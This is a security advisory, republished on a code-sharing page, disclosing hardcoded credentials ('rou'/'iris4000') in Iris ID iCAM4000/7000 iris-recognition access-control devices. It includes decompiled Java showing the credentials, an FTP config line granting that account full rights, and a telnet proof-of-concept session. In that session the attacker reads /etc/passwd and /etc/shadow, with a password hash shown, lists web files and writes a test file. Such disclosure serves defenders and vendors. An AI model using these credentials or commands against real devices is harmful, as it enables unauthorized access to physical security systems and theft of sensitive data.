扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 |
Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access Vendor: Iris ID, Inc. Product web page: http://www.irisid.com <blockquote class="wp-embedded-content" data-secret="DLCU6xSN96"><a href="https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/" target="_blank"rel="external nofollow" class="external" >irisaccess4000</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“irisaccess4000” — Iris ID" src="https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/embed/#?secret=JdLn64gf6q#?secret=DLCU6xSN96" data-secret="DLCU6xSN96" frameborder="0" marginmarginscrolling="no"></iframe> http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/ <blockquote class="wp-embedded-content" data-secret="yrJbZOb18e"><a href="https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/" target="_blank"rel="external nofollow" class="external" >IrisAccess 7000S</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“IrisAccess 7000S” — Iris ID" src="https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/embed/#?secret=Bnmz4MMvH1#?secret=yrJbZOb18e" data-secret="yrJbZOb18e" frameborder="0" marginmarginscrolling="no"></iframe> <blockquote class="wp-embedded-content" data-secret="qj4OAzDHOr"><a href="https://www.irisid.com/productssolutions/hardwareproducts/icam7-series/" target="_blank"rel="external nofollow" class="external" >iCAM7S series</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“iCAM7S series” — Iris ID" src="https://www.irisid.com/productssolutions/hardwareproducts/icam7-series/embed/#?secret=5uwvsmAU8F#?secret=qj4OAzDHOr" data-secret="qj4OAzDHOr" frameborder="0" marginmarginscrolling="no"></iframe> Affected version: iCAM4000: iCAM Software: 3.09.02 iCAM File system: 1.3 CMR Firmware: 5.5 and 3.8 EIF Firmware: 9.5 and 8.0 HID iClass Library: 2.01.05 ImageData Library: 1.153 Command Process: 1.02 iCAM7000: iCAM Software: 8.01.07 iCAM File system: 1.4.0 EIF Firmware: 1.9 HID iClass Library: 1.00.00 ImageData Library: 01.01.32 EyeSeek Library: 5.00 Countermeasure Library: 3.00 LensFinder Library: 5.00 Tilt Assist Library: 4.00 Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered by Iris ID provides fast, secure, and highly accurate, non-contact identification by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy integration with many Wiegand and network based access control, time and attendance, visitor management and point of sale applications. The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess 4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust, iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional wall-mount is used. Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials. When visiting the device interface with a browser on port 80, the application loads an applet JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the JAR file there is an account 'rou' with password 'iris4000' that has read and limited write privileges on the affected node. An attacker can access the device using these credentials starting a simple telnet session on port 23 gaining access to sensitive information and/or FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content. ===================================================================================== /html/ICAMClient.jar (ICAMClient.java): --------------------------------------- 97:param_host = getParameter("host"); 98:param_user = "rou";//getParameter("user"); 99:param_pass = "iris4000";//getParameter("pass"); // password 100: param_path = getParameter("path"); // path on the server /etc/ftpd/ftpd.conf: -------------------- 69:# User list: 70:# Format:user=<login> <passwd> <subdir> <maxlogins> <flags> 71:# <login> user name 72:# <passwd>password or * for anonymous access 73:# <subdir>(internally appended to serverroot) 74:# the user has access to the WHOLE SUBTREE, 75:# if the server has access to it 76:# <maxlogins> maximal logins with this usertype 77:# <flags> D - download 78:# U - upload + making directories 79:# O - overwrite existing files 80:# M - allows multiple logins 81:# E - allows erase operations 82:# A - allows EVERYTHING(!) 101: 103: user=rou iris4000 / 5 A ===================================================================================== Tested on: GNU/Linux 2.4.19 (armv5tel) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5347 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php 06.05.2016 -- telnet [IP] iCAM4000 login: rou Password: [rou@iCAM4000 rou]# id uid=500(rou) gid=500(rou) groups=500(rou) [rou@iCAM4000 rou]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: rou:x:500:500::/home/rou:/bin/bash [rou@iCAM4000 rou]# cd /web [rou@iCAM4000 /web]# ls -al total 0 drwxrwxr-x1 rourou 0 Jul 26 07:22 . drwxr-xr-x1 root root0 Jan11970 .. drwxrwxr-x1 rourou 0 Jan 312013 cgi-bin drwxrwxr-x1 rourou 0 Jan 312013 html drwxrwxr-x1 rourou 0 Jan 312013 images [rou@iCAM4000 /web]# cat /etc/shadow root:{{REMOVED}} bin:*:10897:0:99999:7::: daemon:*:10897:0:99999:7::: adm:*:10897:0:99999:7::: lp:*:10897:0:99999:7::: sync:*:10897:0:99999:7::: shutdown:*:10897:0:99999:7::: halt:*:10897:0:99999:7::: mail:*:10897:0:99999:7::: news:*:10897:0:99999:7::: uucp:*:10897:0:99999:7::: operator:*:10897:0:99999:7::: games:*:10897:0:99999:7::: gopher:*:10897:0:99999:7::: ftp:*:10897:0:99999:7::: nobody:*:10897:0:99999:7::: rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7::: [rou@iCAM4000 /web]# cat /etc/issue Iris@ID iCAM4000 Linux (experimental) Kernel 2.4.19-rmk7-pxa1 on an armv5tel [rou@iCAM4000 /web]# ls -al html/ total 289 drwxrwxr-x1 rourou 0 Jan 312013 . drwxrwxr-x1 rourou 0 Jul 26 07:22 .. -rw-rw-r--1 rourou4035 Jan 312013 DHCPSettings_reboot.htm -rw-rw-r--1 rourou100614 Jan 102008 ICAMClient.jar -rw-rw-r--1 rourou6376 Jan 312013 WiegandSettings.htm -rw-rw-r--1 rourou5643 Jan 312013 authentication.htm -rw-rw-r--1 rourou6166 Jan 312013 changeusername.htm -rw-rw-r--1 rourou4816 Jan 312013 displayconfigsettings.htm -rw-rw-r--1 rourou5643 Jan 312013 downloadauthentication.htm -rw-rw-r--1 rourou4850 Jan 312013 downloadvoice_result.htm -rw-rw-r--1 rourou3237 Jan 312013 error.htm -rw-rw-r--1 rourou3234 Jan 312013 error_ip.htm -rw-rw-r--1 rourou3248 Jan 312013 error_loginfailure.htm -rw-rw-r--1 rourou3349 Jan 312013 error_usb_ip.htm -rw-rw-r--1 rourou6128 Jan 312013 ftpupload.htm -rw-rw-r--1 rourou5331 Jan 312013 iCAMConfig.htm -rw-rw-r--1 rourou4890 Jan 312013 icamconfig_reboot.htm -rw-rw-r--1 rourou5314 Jan 312013 index.htm -rw-rw-r--1 rourou7290 Jan 312013 main.htm -rw-rw-r--1 rourou3662 Jan 312013 reboot_result.htm -rw-rw-r--1 rourou5782 Jan 312013 smartcardauthentication.htm -rw-rw-r--1 rourou 17783 Jan 312013 smartcardconfig.htm -rw-rw-r--1 rourou4895 Jan 312013 smartcardconfig_reboot.htm -rw-rw-r--1 rourou5809 Jan 312013 smartcardconfig_result.htm -rw-rw-r--1 rourou3672 Jan 312013 systeminfo.htm -rw-rw-r--1 rourou5870 Jan 312013 updateicamconfig.htm -rw-rw-r--1 rourou4239 Jan 312013 updateicamconfig_result.htm -rw-rw-r--1 rourou6612 Jan 312013 updatenetworksettings.htm -rw-rw-r--1 rourou4651 Jan 312013 updatenetworksettings_result.htm -rw-rw-r--1 rourou5014 Jan 312013 updatenetworksettings_state.htm -rw-rw-r--1 rourou3985 Jan 312013 upload.htm -rw-rw-r--1 rourou5645 Jan 312013 uploadauthentication.htm -rw-rw-r--1 rourou4737 Jan 312013 uploadiriscapture_result.htm -rw-rw-r--1 rourou6028 Jan 312013 voicemessagedownload.htm -rw-rw-r--1 rourou6299 Jan 312013 voicemessageupdate.htm -rw-rw-r--1 rourou5645 Jan 312013 wiegandauthentication.htm -rw-rw-r--1 rourou4893 Jan 312013 wiegandconfig_reboot.htm [rou@iCAM4000 /web]# echo $SHELL /bin/bash [rou@iCAM4000 /web]# echo pwn > test.write [rou@iCAM4000 /web]# cat test.write pwn [rou@iCAM4000 /web]# rm -rf test.write [rou@iCAM4000 /web]# cd /etc/ftpd [rou@iCAM4000 ftpd]# pwd /etc/ftpd [rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou user=rou iris4000 / 5 A [rou@iCAM4000 ftpd]# ^D Connection to host lost. |
体验盒子
